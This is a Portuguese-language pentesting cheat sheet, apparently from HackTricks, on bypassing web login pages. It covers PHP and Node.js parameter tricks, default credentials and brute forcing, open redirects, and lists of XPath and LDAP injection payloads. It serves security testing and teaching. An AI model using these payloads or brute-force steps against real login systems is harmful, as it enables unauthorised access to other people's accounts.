Login Bypass

Aprenda hacking AWS do zero ao avançado com htARTE (HackTricks AWS Red Team Expert)!

RootedCON é o evento de cibersegurança mais relevante na Espanha e um dos mais importantes na Europa. Com a missão de promover conhecimento técnico, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.

Bypass de login regular

Se você encontrar uma página de login, aqui estão algumas técnicas para tentar burlá-la:

  • Verifique os comentários dentro da página (role para baixo e para a direita?)

  • Verifique se você pode acessar diretamente as páginas restritas

  • Verifique não enviar os parâmetros (não envie nenhum ou apenas 1)

  • Verifique o erro de comparação do PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Mude o tipo de conteúdo para json e envie valores json (bool true incluído)

  • Se você receber uma resposta dizendo que o POST não é suportado, você pode tentar enviar o JSON no corpo, mas com uma solicitação GET com Content-Type: application/json

  • Verifique o potencial erro de análise do nodejs (leia isto): password[password]=1

  • O Nodejs transformará essa carga útil em uma consulta semelhante à seguinte: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; o que faz com que a parte da senha seja sempre verdadeira.

  • Se você puder enviar um objeto JSON, você pode enviar "password":{"password": 1} para burlar o login.

  • Lembre-se de que para burlar este login você ainda precisa saber e enviar um nome de usuário válido.

  • Adicionar "stringifyObjects":true opção ao chamar mysql.createConnection eventualmente bloqueará todos os comportamentos inesperados quando Object é passado como parâmetro.

  • Verifique as credenciais:

  • Credenciais padrão da tecnologia/plataforma usada

  • Combinações comuns (root, admin, password, nome da tecnologia, usuário padrão com uma dessas senhas).

  • Crie um dicionário usando Cewl, adicione o nome de usuário e senha padrão (se houver) e tente fazer força bruta usando todas as palavras como nomes de usuário e senha

  • Força bruta usando um dicionário maior (Força bruta)

Bypass de autenticação de injeção SQL

Aqui você pode encontrar várias dicas para burlar o login via injeções SQL.

Na página a seguir, você pode encontrar uma lista personalizada para tentar burlar o login via Injeções SQL:

pageLogin bypass List

Bypass de autenticação de injeção No SQL

Aqui você pode encontrar várias dicas para burlar o login via No SQL Injections.

Como as Injeções NoSQL exigem alterar o valor dos parâmetros, você precisará testá-los manualmente.

Bypass de autenticação de injeção XPath

Aqui você pode encontrar várias dicas para burlar o login via Injeção XPath.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Autenticação de injeção LDAP

Aqui você pode encontrar vários truques para contornar o login via Injeção LDAP.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Lembrar de Mim

Se a página tiver funcionalidade de "Lembrar de Mim", verifique como ela está implementada e veja se você pode abusar dela para assumir o controle de outras contas.

Redirecionamentos

As páginas geralmente redirecionam os usuários após o login, verifique se você pode alterar esse redirecionamento para causar um Redirecionamento Aberto. Talvez você possa roubar algumas informações (códigos, cookies...) se redirecionar o usuário para o seu site.

Outras Verificações

  • Verifique se você pode enumerar nomes de usuários abusando da funcionalidade de login.

  • Verifique se o auto-preenchimento está ativo nos formulários de senha/informações sensíveis de entrada: <input autocomplete="false"

​​RootedCON é o evento de cibersegurança mais relevante na Espanha e um dos mais importantes na Europa. Com a missão de promover o conhecimento técnico, este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Last updated